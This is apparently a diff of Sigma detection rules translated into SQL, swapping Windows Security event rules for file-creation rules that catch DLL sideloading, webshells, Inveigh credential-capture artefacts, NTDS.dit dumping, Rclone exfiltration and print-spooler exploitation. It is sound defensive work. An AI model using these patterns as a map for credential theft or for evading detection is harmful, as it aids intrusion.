"frack113", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.credential_access" + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "status": "test", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "status": "test", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.003" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], 